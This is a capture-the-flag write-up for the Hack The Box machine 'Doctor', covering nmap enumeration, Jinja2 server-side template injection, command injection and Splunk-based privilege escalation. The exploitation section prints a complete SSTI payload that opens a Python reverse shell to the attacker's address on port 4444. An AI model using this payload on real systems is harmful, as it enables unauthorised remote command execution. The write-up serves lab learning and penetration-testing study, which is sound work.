Doctor | HTB| OSCP | Box 3

Part of TJ Null OSCP Box Series

Enumeration

NMAP

┌──(root💀kali)-[/home/kali/htb/doctor]
└─# nmap -A -sV -sC -O -p- 10.10.10.209
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-10 15:43 EDT
Nmap scan report for 10.10.10.209
Host is up (0.093s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA)
|   256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA)
|_  256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Doctor
8089/tcp open  ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after:  2023-09-06T15:57:27
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 - 5.3 (92%), Linux 4.15 - 5.6 (90%), Linux 5.0 (90%), Crestron XPanel control system (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.4 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   95.39 ms 10.10.14.1
2   96.46 ms 10.10.10.209
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 188.38 seconds

Following commands are also part of the enumeration approach:

>nmap --script vuln -p 22,80,8089 10.10.10.209
>nmap -sU -A -p 1-1000 10.10.10.209

Port 22

• It has SSH on it.
• There are no known vulnerabilities so far I’m aware of, So, I would start with the web server as they have a large attack surface.

Port 80

Starting with Index page:

It is the proper website. I have enumerated every link and tab, they all redirect to the same homepage.

And Then I reviewed the Source Code of this website, however, at this time, there is no lead.

However, I found a domain name: doctors.htb

This domain, I added in /etc/hosts file in my kali.

Upon visiting it, I found a login page.

I tried to log in with info@doctors.htb, admin@doctors.htb, etc. but was unable to login

As I didn’t have the credentials. I signed as a new account and was able to log in.

Directory and sub-domain Bruteforce

I ran the following tools to find any sub-domain or any directories.

• Wfuzz wasn’t able to find any subdomain

• Feroxbuster on doctors.htb

• Feroxbuster on 10.10.10.209

Nothing Interesting was found.

Port 8089

It has Splunk running on it. I found some interesting tools but I didn’t have credentials so it didn’t work.

I tried some default / easy admin: pass pairs but didn’t work.

I used the following tools from this repo and there is a good article to explain the context.

Exploitation / Initial Foothold

I found my way into this box through the following two methods:

1. Server-Side Template Injection (SSTI)
2. Command Injection

Server-Side Template Injection (SSTI)

SSTI has three stages

As we are adding more data using the post new message tab, /archive dynamically add that into it. It shows their/archive is a template and there is a template engine working in the backend that would take data from the post and add it into the template.

According to the table: we got Jinja2

What is Jinja2? Jinja is a web template engine for the Python programming language.

This is the amazing repo for SSTI injection. I took a reverse shell from this repo

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.3\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\", \"-i\"]);'").read().zfill(417)}}{%endif%}{% endfor %}

Command Injection

I started with this, if HTML link would get a hit on my server.

The moment I hit submit.

When I deactivated the server. The link appears to be invalid.

So, this time instead of web-server, I opened a netcat

The link was again shown as invalid at the doctor.htb panel but I got following:

There is curl in action behind the scene. Even though from the template injection we have a python template engine running the backend.

I tried several other methods/alterations until I found that worked for me.

This one didn’t work!

I was unable to cat user.txt.

Shell as Shaun

As web user is part of adm group.

Adm group gives the privilege to read most logs files.

When I ran linpeas, I found the password of Shaun user.

User.txt

Privilege Escalation

Now we have credentials of Shaun, let’s try if we can access splunk on 8089.

Using Splunk exploitation tool from this repo

I got a hit on my web-server.

Let’s run a reverse shell.

Root.txt